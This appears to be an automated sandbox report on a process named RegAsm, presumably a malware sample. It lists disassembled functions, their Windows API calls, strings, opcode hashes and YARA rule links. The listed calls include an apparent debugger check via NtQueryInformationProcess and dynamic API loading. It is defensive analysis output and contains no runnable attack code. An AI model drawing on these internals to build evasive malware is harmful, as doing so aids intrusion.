NtQueryVirtualMemory.NTDLL ref: 6C57B9A5

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: MemoryQueryVirtualrand_s
String ID:
API String ID: 1889792194-0
Opcode ID: efb8822ac1f994674fc02409faa89b86d5168aedf21d186b864530edc7225ec7
Instruction ID: b478f78fad4ed106343f274ee32382f1f0d323b8a91a993d1fb34061ffae6c62
Opcode Fuzzy Hash: efb8822ac1f994674fc02409faa89b86d5168aedf21d186b864530edc7225ec7
Instruction Fuzzy Hash: 8E418171E01219DFDF14EFA9DC80ADEB7B6EF88314F148129E515A7744EB30AC458BA0

Function 0041C0E9 Relevance: 3.1, APIs: 2, Instructions: 63timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,762283C0,00000000,?,?,?,?,?,?,?,?,0041C5A4,?), ref: 0041C13E
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0041C5A4,?), ref: 0041C14C

Part of subcall function 0041B92A: FileTimeToSystemTime.KERNEL32(?,?,?,?,0041C211,?,?,?,?,?,?,?,?,?,?,0041C5B4), ref: 0041B942

Part of subcall function 0041B906: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041B923

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 568878067-0
Opcode ID: e18be1e8a3847ab2d69564342152f85ca1bd5b155455464045d2105bdf40e3da
Instruction ID: e9dd666d6f03e3bc2370fb34bb5a4ee32d8a7198e314cb59bed8413d438bc6b2
Opcode Fuzzy Hash: e18be1e8a3847ab2d69564342152f85ca1bd5b155455464045d2105bdf40e3da
Instruction Fuzzy Hash: D421E6B19002099FCF44DF69D9806ED7BF5FF08300F1041BAE949EA21AE7398945DFA4

Function 0040145B Relevance: 3.0, APIs: 2, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 0040146D
NtQueryInformationProcess.NTDLL(00000000), ref: 00401474

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CurrentInformationQuery
String ID:
API String ID: 3953534283-0
Opcode ID: 4ad97b2d1b6fe464e896af9ca2ec5f1d337a2bfbe60684343260282f6ee0994e
Instruction ID: b0d32a7bd978dbc9842abeebd7712166406d741a383243a14520f93e3bb00ea5
Opcode Fuzzy Hash: 4ad97b2d1b6fe464e896af9ca2ec5f1d337a2bfbe60684343260282f6ee0994e
Instruction Fuzzy Hash: 23E01271640304F7EF109BA0DD0AF5F72AC9700749F201175A606E60E0D6B8DA009A69

Function 0042B556 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32(Function_0002B1C1,00000001), ref: 0042B56F

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 50f329e47e560d397284a7460fab74257ebf44bd3fd5d611c322744838e49ff6
Instruction ID: a965a9a856964b19ccfd622dabb5ac07b34b26fd65f40016140b6e3a2338ef0b
Opcode Fuzzy Hash: 50f329e47e560d397284a7460fab74257ebf44bd3fd5d611c322744838e49ff6
Instruction Fuzzy Hash: 20D05E71B50700ABD7204F30AD497B177A0EB20B16F70994ADC92490C0D7B865D58649

Function 0042762E Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000275EC), ref: 00427633

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: aa3703d3437d06fb50dade6e7388276a3799fb2df3744491841b8284a36df350
Instruction ID: 9d6a1cee47f635cf13ac9ce2c832d8e993c26a4a09d493c42fccfa592e4f4ed0
Opcode Fuzzy Hash: aa3703d3437d06fb50dade6e7388276a3799fb2df3744491841b8284a36df350
Instruction Fuzzy Hash: 109002A035E250578A0217716C1D50565946A48706B951561A001C4454DBA580409919

Function 0040111D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
Instruction ID: 43cdf4ecb647160fda175e5076d83385583e07dd488e496ff266cef725db0fb4
Opcode Fuzzy Hash: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
Instruction Fuzzy Hash: 7ED092B1509719AFDB288F5AE480896FBE8EE48274750C42EE8AE97700C231A8408B90

Function 00418599 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
Instruction ID: 81b03007a1f881deed44a42fc0175a6fbd256bce6d09bf2effb1e14420dd7128
Opcode Fuzzy Hash: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
Instruction Fuzzy Hash: DEE04278A55644DFC741CF58D195E99B7F0EB09368F158199E806DB761C274EE00DF00

Function 0041859A Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50

Function 0040148A Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58

Function 004014A2 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950

Function 0040DCA0 Relevance: 90.4, APIs: 60, Instructions: 399memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040DB7F: lstrlenA.KERNEL32(?,75B65460,?,00000000), ref: 0040DBBB
Part of subcall function 0040DB7F: strchr.MSVCRT ref: 0040DBCD

GetProcessHeap.KERNEL32(00000008,?,75B65460,?,00000000), ref: 0040DD04
HeapAlloc.KERNEL32(00000000), ref: 0040DD0B
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DD20
HeapFree.KERNEL32(00000000), ref: 0040DD27
strcpy_s.MSVCRT ref: 0040DD43
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DD55
HeapFree.KERNEL32(00000000), ref: 0040DD62
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DD93
HeapFree.KERNEL32(00000000), ref: 0040DD9A
GetProcessHeap.KERNEL32(00000008,?), ref: 0040DDA1
HeapAlloc.KERNEL32(00000000), ref: 0040DDA8
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DDBD
HeapFree.KERNEL32(00000000), ref: 0040DDC4
strcpy_s.MSVCRT ref: 0040DDDA
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DDEC
HeapFree.KERNEL32(00000000), ref: 0040DDF3
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DE11
HeapFree.KERNEL32(00000000), ref: 0040DE18
GetProcessHeap.KERNEL32(00000008,?), ref: 0040DE1F
HeapAlloc.KERNEL32(00000000), ref: 0040DE26
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DE3B
HeapFree.KERNEL32(00000000), ref: 0040DE42
strcpy_s.MSVCRT ref: 0040DE52
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DE64
HeapFree.KERNEL32(00000000), ref: 0040DE6B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DE93
HeapFree.KERNEL32(00000000), ref: 0040DE9A
GetProcessHeap.KERNEL32(00000008,?), ref: 0040DEA1
HeapAlloc.KERNEL32(00000000), ref: 0040DEA8
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DEC3
HeapFree.KERNEL32(00000000), ref: 0040DECA
strcpy_s.MSVCRT ref: 0040DEDD
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DEEF
HeapFree.KERNEL32(00000000), ref: 0040DEF6
lstrlenA.KERNEL32(00000000), ref: 0040DEFF
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0040DF15
HeapAlloc.KERNEL32(00000000), ref: 0040DF1C
lstrlenA.KERNEL32(00000000), ref: 0040DF34

Part of subcall function 0040F128: std::_Xinvalid_argument.LIBCPMT ref: 0040F13E

strcpy_s.MSVCRT ref: 0040DF75
GetProcessHeap.KERNEL32(00000000,?,00000001,00000001), ref: 0040DF9B
HeapFree.KERNEL32(00000000), ref: 0040DFA8
lstrlenA.KERNEL32(?), ref: 0040DFAD
GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040DFBC
HeapAlloc.KERNEL32(00000000), ref: 0040DFC3
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DFD7
HeapFree.KERNEL32(00000000), ref: 0040DFDE
strcpy_s.MSVCRT ref: 0040DFEC
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DFF9
HeapFree.KERNEL32(00000000), ref: 0040E000
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E035
HeapFree.KERNEL32(00000000), ref: 0040E03C
GetProcessHeap.KERNEL32(00000008,?), ref: 0040E043
HeapAlloc.KERNEL32(00000000), ref: 0040E04A
strcpy_s.MSVCRT ref: 0040E065
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E077
HeapFree.KERNEL32(00000000), ref: 0040E07E
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E122
HeapFree.KERNEL32(00000000), ref: 0040E129
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E173
HeapFree.KERNEL32(00000000), ref: 0040E17A

Part of subcall function 0040DB7F: strchr.MSVCRT ref: 0040DBF2
Part of subcall function 0040DB7F: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC14
Part of subcall function 0040DB7F: GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC21
Part of subcall function 0040DB7F: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC28
Part of subcall function 0040DB7F: strcpy_s.MSVCRT ref: 0040DC6F

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$strchr$Xinvalid_argumentstd::_
String ID:
API String ID: 838878465-0
Opcode ID: 2561c5df908cdd488d2aa22bbe433537ad81f979b143cb002045d8ef8f0c2ae7
Instruction ID: 0a8d11442738e0aebf2a58bd4f58ea1ebce0464b8d6fd0751a66cb0fe0de1c79
Opcode Fuzzy Hash: 2561c5df908cdd488d2aa22bbe433537ad81f979b143cb002045d8ef8f0c2ae7
Instruction Fuzzy Hash: F0E14C72C00219ABEF249FF1DC48ADEBF79BF08305F1454AAF115B3152EA3A59849F54

Function 6C5755F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6C54E1A5), ref: 6C575606
LoadLibraryW.KERNEL32(gdi32,?,6C54E1A5), ref: 6C57560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C575633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C57563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C57566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C57567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C575696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C5756B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C5756CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C5756E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C5756FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C575716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C57572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C575748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C575761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C57577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C575793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C5757A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C5757BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C5757D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C5757EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C5757FF

Strings

GetSystemMetricsForDpi, xrefs: 6C575677
MonitorFromWindow, xrefs: 6C57578D
LoadIconW, xrefs: 6C57575B
CreateWindowExW, xrefs: 6C5756C5
FillRect, xrefs: 6C575729
GetThreadDpiAwarenessContext, xrefs: 6C57562D
DeleteObject, xrefs: 6C5757F9
StretchDIBits, xrefs: 6C5757CC
EnableNonClientDpiScaling, xrefs: 6C575666
CreateSolidBrush, xrefs: 6C5757E4
ShowWindow, xrefs: 6C5756DE
LoadCursorW, xrefs: 6C575774
AreDpiAwarenessContextsEqual, xrefs: 6C575637
gdi32, xrefs: 6C57560A
RegisterClassW, xrefs: 6C5756AC
GetWindowDC, xrefs: 6C575710
SetWindowPos, xrefs: 6C5756F7
GetMonitorInfoW, xrefs: 6C5757A2
SetWindowLongPtrW, xrefs: 6C5757B7
ReleaseDC, xrefs: 6C575742
GetDpiForWindow, xrefs: 6C575690
user32, xrefs: 6C575601

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: 95d8c8e4e8149c55efcfbdb9f3ba59fd469dbfc3c1e1dc9c79721c6bac77fb5f
Instruction ID: 82b2e8490416a1a6a2dd9af0d291e1546806343233125d636c7f998f1f333ef0
Opcode Fuzzy Hash: 95d8c8e4e8149c55efcfbdb9f3ba59fd469dbfc3c1e1dc9c79721c6bac77fb5f
Instruction Fuzzy Hash: 095146707117929BEB11AF358D4492A3AFCAB0B24576345ADB912E2A52EF74CC40CF78

Function 6C55CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C52582D), ref: 6C55CC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C52582D), ref: 6C55CC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C58FE98,?,?,?,?,?,6C52582D), ref: 6C55CC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C52582D), ref: 6C55CC6C
